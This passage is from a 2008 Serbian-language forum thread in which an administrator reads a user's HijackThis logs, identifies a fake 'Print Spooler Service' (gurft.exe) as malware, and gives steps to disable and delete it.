C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll O4 - HKLM\..\Run: [Smapp] C:\Program Files\Analog Devices\SoundMAX\SMTray.exe O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min O4 - HKLM\..\Run: [ZoneAlarm Client] "D:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe" O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe" O4 - HKCU\..\Run: [RocketDock] "D:\Program Files\RocketDock\RocketDock.exe" O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background O4 - HKCU\..\Run: [BirthdayRemember6] "D:\Program Files\BirthdayRemember\BirthdayRemember.exe" "autostart" O4 - Startup: ATITool.lnk = D:\Program Files\ATITool\ATITool.exe O4 - Startup: Yahoo! Widgets.lnk = D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe O4 - Global Startup: Kodak EasyShare software.lnk = D:\Program Files\Kodak EasyShare\Kodak EasyShare software\bin\EasyShare.exe O8 - Extra context menu item: Download all links with IDM - D:\Program Files\Internet Download Manager\IEGetAll.htm O8 - Extra context menu item: Download FLV video content with IDM - D:\Program Files\Internet Download Manager\IEGetVL.htm O8 - Extra context menu item: Download with IDM - D:\Program Files\Internet Download Manager\IEExt.htm O8 - Extra context menu item: E&xport to Microsoft Excel - [Link mogu videti samo ulogovani korisnici]\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000 O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll O11 - Options group: [INTERNATIONAL] International* O11 - Options group: [TABS] Tabbed Browsing O17 - HKLM\System\CCS\Services\Tcpip\..\{5DAA73B5-BA99-453B-B50D-BDE4B1E5C866}: NameServer = 80.65.162.101 217.199.128.11 O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL O23 - Service: Print Spooler Service (abnda7guebpxo) - Unknown owner - C:\WINDOWS\system32\gurft.exe (file missing) O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe O23 - Service: Indexing Service (CiSvc) - Unknown owner - C:\WINDOWS\system32\cisvc.exe (file missing) O23 - Service: Kodak Camera Connection Software (KodakCCS) - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\Cyberlink\Shared files\RichVideo.exe O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe O23 - Service: Uninterruptible Power Supply (UPS) - Unknown owner - C:\WINDOWS\System32\ups.exe (file missing) O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe

Profil

bobby Poslao: 21 Feb 2008 17:48 Idi na vrh
offline bobby Administrator Pridružio: 04 Sep 2003 Poruke: 24135 Gde živiš: Wien	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Otvori Control Panel > Administrative Tools > Services i u desnoj koloni nadji servis pod imenom Print Spooler Service. Klikni na njega desnim dugmetom misa i odaberi opciju Stop. Klikni opet na njega desnim dugmetom misa i odaberi Properties. U dijalogu koji se bude otvorio postavi Startup type na Disabled. Nakon toga pronadji i obrisi fajl C:\WINDOWS\system32\gurft.exe Ostala dva servisa mozes zaustaviti na isti nacin, mada su ta dva servisa legitimni. Indexing Service ti omogucava brzi Search i brzi ulazak u foldere u kojima ima puno fajlova. Zaduzen je i da brine o tome da neki proces ne zauzme procesor 100%, pa da ostali programi, a i sam Windows, izgledaju kao da su blokirali. Uninterruptible Power Supply je servis za neprekidna napajanja. Zaustavi ga slobodno ukoliko nemas UPS.

Profil

aMeR K Poslao: 22 Feb 2008 16:29 Idi na vrh
offline aMeR K Građanin Pridružio: 16 Apr 2007 Poruke: 64 Gde živiš: Sarajevo	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! uradio sam sve to iz Hijack This-a nestao je gurft.exe i ostala gamad ima li jos kakvih virusa na sistemu ili je sada cist Dopuna: 22 Feb 2008 16:29 evo novi Hijack This log ako ce pomoci hocu li izbrisati sad ovaj combofix ili... hvala puno na pomoci sam ne bih nikako mogao Logfile of HijackThis v1.99.1 Scan saved at 16:25, on 2008-02-22 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.20733) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\ZoneLabs\vsmon.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe C:\WINDOWS\Explorer.EXE C:\Program Files\Analog Devices\SoundMAX\SMTray.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe D:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe D:\Program Files\RocketDock\RocketDock.exe C:\WINDOWS\system32\drivers\KodakCCS.exe C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE D:\Program Files\Kodak EasyShare\Kodak EasyShare software\bin\EasyShare.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\WINDOWS\system32\svchost.exe D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe C:\Program Files\Mozilla Firefox\firefox.exe C:\Documents and Settings\Computer\My Documents\Applications\B3.exe O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll O4 - HKLM\..\Run: [Smapp] C:\Program Files\Analog Devices\SoundMAX\SMTray.exe O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min O4 - HKLM\..\Run: [ZoneAlarm Client] "D:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe" O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe" O4 - HKCU\..\Run: [RocketDock] "D:\Program Files\RocketDock\RocketDock.exe" O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background O4 - HKCU\..\Run: [BirthdayRemember6] "D:\Program Files\BirthdayRemember\BirthdayRemember.exe" "autostart" O4 - Startup: ATITool.lnk = D:\Program Files\ATITool\ATITool.exe O4 - Startup: Yahoo! Widgets.lnk = D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe O4 - Global Startup: Kodak EasyShare software.lnk = D:\Program Files\Kodak EasyShare\Kodak EasyShare software\bin\EasyShare.exe O8 - Extra context menu item: Download all links with IDM - D:\Program Files\Internet Download Manager\IEGetAll.htm O8 - Extra context menu item: Download FLV video content with IDM - D:\Program Files\Internet Download Manager\IEGetVL.htm O8 - Extra context menu item: Download with IDM - D:\Program Files\Internet Download Manager\IEExt.htm O8 - Extra context menu item: E&xport to Microsoft Excel - [Link mogu videti samo ulogovani korisnici]\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000 O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll O11 - Options group: [INTERNATIONAL] International* O11 - Options group: [TABS] Tabbed Browsing O17 - HKLM\System\CCS\Services\Tcpip\..\{5DAA73B5-BA99-453B-B50D-BDE4B1E5C866}: NameServer = 80.65.162.101 217.199.128.11 O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe O23 - Service: Indexing Service (CiSvc) - Unknown owner - C:\WINDOWS\system32\cisvc.exe (file missing) O23 - Service: Kodak Camera Connection Software (KodakCCS) - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\Cyberlink\Shared files\RichVideo.exe O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe

Profil

bobby Poslao: 22 Feb 2008 17:23 Idi na vrh
offline bobby Administrator Pridružio: 04 Sep 2003 Poruke: 24135 Gde živiš: Wien	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Uloguj se preko Facebooka da bi skinuo fajl:

Profil

aMeR K Poslao: 23 Feb 2008 19:29 Idi na vrh
offline aMeR K Građanin Pridružio: 16 Apr 2007 Poruke: 64 Gde živiš: Sarajevo	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! izbrisao sam Combofix jos jednom HVALA Dopuna: 23 Feb 2008 19:29 u medjuvremenu su se pojavili jos neki servisi u HijackThisu instalirao sam Corel i Photoshop ali ne vjerujem da su to njihovi servisi evo novog HijackThis loga hvala unaprijed Logfile of HijackThis v1.99.1 Scan saved at 19:24, on 2008-02-23 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.20733) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\ZoneLabs\vsmon.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe C:\Program Files\Bonjour\mDNSResponder.exe C:\WINDOWS\system32\drivers\KodakCCS.exe C:\WINDOWS\Explorer.EXE C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\WINDOWS\system32\svchost.exe C:\Program Files\Analog Devices\SoundMAX\SMTray.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe D:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe D:\Program Files\RocketDock\RocketDock.exe C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe D:\Program Files\Kodak EasyShare\Kodak EasyShare software\bin\EasyShare.exe C:\WINDOWS\system32\msiexec.exe D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe C:\Program Files\Mozilla Firefox\firefox.exe C:\Documents and Settings\Computer\My Documents\Applications\B3.exe R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = .local O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll O4 - HKLM\..\Run: [Smapp] C:\Program Files\Analog Devices\SoundMAX\SMTray.exe O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min O4 - HKLM\..\Run: [ZoneAlarm Client] "D:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe" O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe" O4 - HKCU\..\Run: [RocketDock] "D:\Program Files\RocketDock\RocketDock.exe" O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background O4 - HKCU\..\Run: [BirthdayRemember6] "D:\Program Files\BirthdayRemember\BirthdayRemember.exe" "autostart" O4 - Startup: ATITool.lnk = D:\Program Files\ATITool\ATITool.exe O4 - Startup: Yahoo! Widgets.lnk = D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe O4 - Global Startup: Kodak EasyShare software.lnk = D:\Program Files\Kodak EasyShare\Kodak EasyShare software\bin\EasyShare.exe O8 - Extra context menu item: Download all links with IDM - D:\Program Files\Internet Download Manager\IEGetAll.htm O8 - Extra context menu item: Download FLV video content with IDM - D:\Program Files\Internet Download Manager\IEGetVL.htm O8 - Extra context menu item: Download with IDM - D:\Program Files\Internet Download Manager\IEExt.htm O8 - Extra context menu item: E&xport to Microsoft Excel - [Link mogu videti samo ulogovani korisnici]\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000 O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll O11 - Options group: [INTERNATIONAL] International O11 - Options group: [TABS] Tabbed Browsing O17 - HKLM\System\CCS\Services\Tcpip\..\{5DAA73B5-BA99-453B-B50D-BDE4B1E5C866}: NameServer = 80.65.162.101 217.199.128.11 O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe O23 - Service: ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## (Bonjour Service) - Apple Computer, Inc. - C:\Program Files\Bonjour\mDNSResponder.exe O23 - Service: Indexing Service (CiSvc) - Unknown owner - C:\WINDOWS\system32\cisvc.exe (file missing) O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe O23 - Service: Kodak Camera Connection Software (KodakCCS) - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe O23 - Service: Protexis Licensing V2 (PSI_SVC_2) - Protexis Inc. - C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\Cyberlink\Shared files\RichVideo.exe O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe

Profil

bobby Poslao: 23 Feb 2008 22:33 Idi na vrh
offline bobby Administrator Pridružio: 04 Sep 2003 Poruke: 24135 Gde živiš: Wien	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Svi servisi iz tvog loga su legitimni.

Profil

MyCity » Ambulanta -> Arhiva Ambulante » Hackovan?

Ko je trenutno na forumu

Ukupno su 858 korisnika na forumu :: 18 registrovanih, 1 sakriven i 839 gosta :: [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:: Korisnici trenutno na forumu: AleksandarV, babaroga, benne, Bobrock1, branko7, comi, draganl, GrobarPovratak, Jose, Nobunaga, Penzula, PrincipL, RD84, Saša31LPB, Slingshot, styg, Tila Painen, tvlada

Svaki korisnik ovog sajta je odgovoran za sadržaj svoje poruke koju objavi na sajtu. Sajt se odriče svake odgovornosti za sadržaj tih poruka.
Postavljanjem vaše poruke ili vašeg autorskog dela na ovaj sajt, saglasni ste da ovaj sajt postaje distributer vašeg dela, i odričete se mogućnosti njegovog povlačenja ili brisanja, bez saglasnosti uprave sajta.
Distribucija sadržaja sa ovog sajta je dozvoljena samo u nekomercijalne svrhe, uz obaveznu napomenu da je sadržaj preuzet sa ovog sajta, i uz obavezno navođenje adrese MyCity sajta. Za sve ostale vidove distribucije obavezni ste da prethodno zatražite odobrenje od vlasnika MyCity sajta.
MyCity pokrenuo, administrira i razvija Predrag Damnjanović, a o uređenju sajta se brine MyCity Tim.
Ukoliko želite da nas kontaktirate kliknite ovde.
Naši sajtovi:
Vesti, Vojni forum, Zaštita od virusa, TekstPesme.rs

This content is licensed under a Creative Commons License.
Based on phpBB 2, translated by Simke, designed by